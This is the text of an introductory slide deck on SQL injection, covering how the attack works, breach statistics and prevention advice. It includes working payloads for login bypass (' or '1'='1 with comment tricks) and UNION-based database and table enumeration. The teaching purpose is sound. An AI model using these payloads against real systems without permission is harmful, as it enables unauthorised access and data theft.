SQL Injection (AKA. SQLI)

  

Abhinav Sejpal



Who am I


Abhinav Sejpal 




Disclaimer


  • This Presentation is intended for educational purposes only and I cannot be held liable for any kind of damages done whatsoever to your machine, or other damages. 
  • Please - Don't try this attack on any others system without having context knowledge or permission, this may harm to someone directly or indirectly.
  • Feel free to use this presentation for practice or education purpose.


^ I hope - You gotcha ^

Agenda


  •  Basic of  Web application
  •  What is SQL Injection
  •  Basic SQL Injection vector & How to test
  •  Proof of Concept (Demo)
  •  Prevention of SQL Injection Attack
  •  Q & A


Social Media feed


Hashtag for this session

     #WTBNT12 , #SQLi , #SQLinjection


: Twitter handle for feedback :

 @weekendtesting  @Abhinav_Sejpal


G+ https://plus.google.com/events/c1hkhlb3tkmmrc0ikkr5r2sgji0

How Web works ?


HTTP Header Flow


 Tamper Google HTTP request!


So, I have questions?

  • Does the user input go through any validation at user’s web browser?
  • Does Business Logic verify the user inputs at server side?

 

If your answer is 'No' then Be ready Meet to 'Nightmare'



Conclusion


Modern websites rely on user input for everything.
They are basically applications which expect various kinds of inputs coming from users to function a certain way. 


 ~ Courtesy   ~



I AM that bad input

' SQL Injection ' 



What is SQL ?


SQL stands for Structured Query Language.


  • Execute queries against a database
  • Retrieve data from a database
  • Insert new records in a database
  • Delete records from a database
  • In short, All DB operations :)


 User Input? aha


What if this works? Umm


It's me SQL Injection

  • People call me SQLi also

  • 'Yes' - I M bottleneck for Developers since many years

  • I listed at top 10 vulnerabilities in OWASP (2013)

  • Smart Geeks opt me along with user inputs &  perform attack.
               

History Attack via SQLi


  •  SQL injection has been responsible for 83% of all
    successful hacking-related data
    breaches, from 2005-2011.

    (source: Privacyrights.org)


  • Automation Infects 100,000s: In 2008,
    SQLi attacks become automated via the
    use of botnets. Mass website infection
    incidents include 500,000 reported in
    2008, 210,000 in 2009, 500,000 in 2010,
    and 380,000 in 2011



SQLi facts


  • Dominant Source of Attack: 97 percent
    of data breaches worldwide are due to
    SQL injection.
    (source: National Fraud Authority UK)


  • Web Application Risk: SQL
    Injection was the leading Web
    application risk of 2011. It ranks as one
    of the most common software
    vulnerabilities in survey after survey(source: Trustwave)


Myth


SQLI is old days problem - i shouldn't worry about this.

^^

I am using Java / PHP / RUBY / ASP Modern days framework.

CAKE PHP
Struts 2
Spring 
GWT (Google Web toolkit)
ESAPI


Latest SQL Injection Campaign Infects 1 Million Web Pages


Yahoo Hit By SQL Injection Attack


SQL injection flaw in Wall Street Journal database led to breach


SQL injection isn't going any where  <3


Error Based SQLi


Demo

http://sqli.cyberwebdeveloper.com/index.php

Concept

Basic SQL query Login page :-

SELECT * FROM users where username="username" AND password = "pass"


Basic PHP statement for Login page :-

SELECT * FROM users where username='".$username."' AND password = '".md5($pass)."'"  


*Md5() method is used to encrypt the password.

       * Demo at SQL *

Cheat sheet


#Attack  - 1


SELECT * FROM `users` WHERE `username` ='admin' or '1'='1' and password ='I dont know'


Injection code :-

admin' or '1'='1


Why ?

Attack 1 is rely on 'User name'


SELECT * FROM `users` WHERE `username` ='admin' or '1'='1' and password ='I dont know'


Can't perform this attack on password field due to encryption.

User name = anything' or '1' ='1

password = anything' or '1'='1


* known User name is mandatory Here*

Learnings from the attack 1


User name is known i.e. 'admin'

  •  Append SQL statement with user name
  •  
  • <It simply works>

    But you can't perform this attack if the user name

    Comments based SQLi

    http://dev.mysql.com/doc/refman/5.1/en/comments.html


    # : Single line comment

    "-- " : Sequence to end of line comment

    /*  Sequence to following block comment*/

    Concept

    Basic SQL query Login page :-

    SELECT * FROM users where username="username" AND password = "pass"


    What if  - I insert comments in first attack

    SELECT * FROM users where username="admin" or '1' ='1' # AND password = "pass"


    << AND password = "pass" >> doesn't execute all

    if you get me - attack doesn't require user name now


     SELECT * FROM users where username="admin" or '1' ='1' # AND password = "pass"


    SQL statement will be always true due  '1' = '1'  thus doesn't matter, you are knowing user name or not.


    Yes - I am done. but what if '#' is not valid input?

    (-- ) works for you buddy!

    * --(space) is syntax 


    admin' or '1' = '1' --:False 

    admin' or '1' = '1' --  : True


    Mostly people forget to add space, so I use below vector

    admin' or '1' = '1' -- space + any one character

    E.G. > admin' or '1' = '1' -- Sandy


    So, What do you think,

    SQL is all about  1=1

    ssshhh - Do you hear that? - NO

    Dump Sensitive DB info


    * Identify column gets selected.

    * Identify the data set which value will be displayed.


    a%' union select 1,2,3,4,5 from users #


    a%' union select 1,@@datadir,2,3,4 from users #

    a%' union select 1,@@version,3,4,5 from users #



    Database Enumeration  


    a%' union select 1,table_schema,2,3,4 from information_schema.tables  #

    Table Enumeration

    a%' union select 1,table_schema,table_name,3,4 from information_schema.tables  #


    a%' union select 1,table_schema,table_name,3,4 from information_schema.tables  where table_schema='sqlhumla'#

    How to prevents SQLi


    • White List Input Validation
    • Least Privilege to DB user
    • Escaping all User Supplied Input - Don't Trust user input
    • Use of Stored Procedures
    • Use of Prepared Statements (Parameterized Queries)


    There is no silver bullet to stop this - Just Trust your code

    ~ Keep Hacking your Code ~

    Good Blogs



    -- ^ Google Darling search with #Sqlinjection^--


    Credits



    - Twitter Folks -
    @BillKarwin , @riyazwalikar , @JosephMcCray , @sqlinjwiki
    @TroyHunt , @yog3sharma , @makash & @anatshri

    Big thank You to @weekendtesting , @srinivasskc & you All.

    Yes - I'm Done!


    Feel free to write me at bug.wrangler at outlook.com

    License and Copyrights


    https://slides.com/abhinavsejpal/sql-injection-for-beginners/

    copyrights 2013-2014 Abhinav Sejpal

    -----

     (CC BY-NC-ND 3.0)

    Attribution-NonCommercial-NoDerivs 3.0 Unported

     Dedicated to my lovely daddy




    Made with Slides.com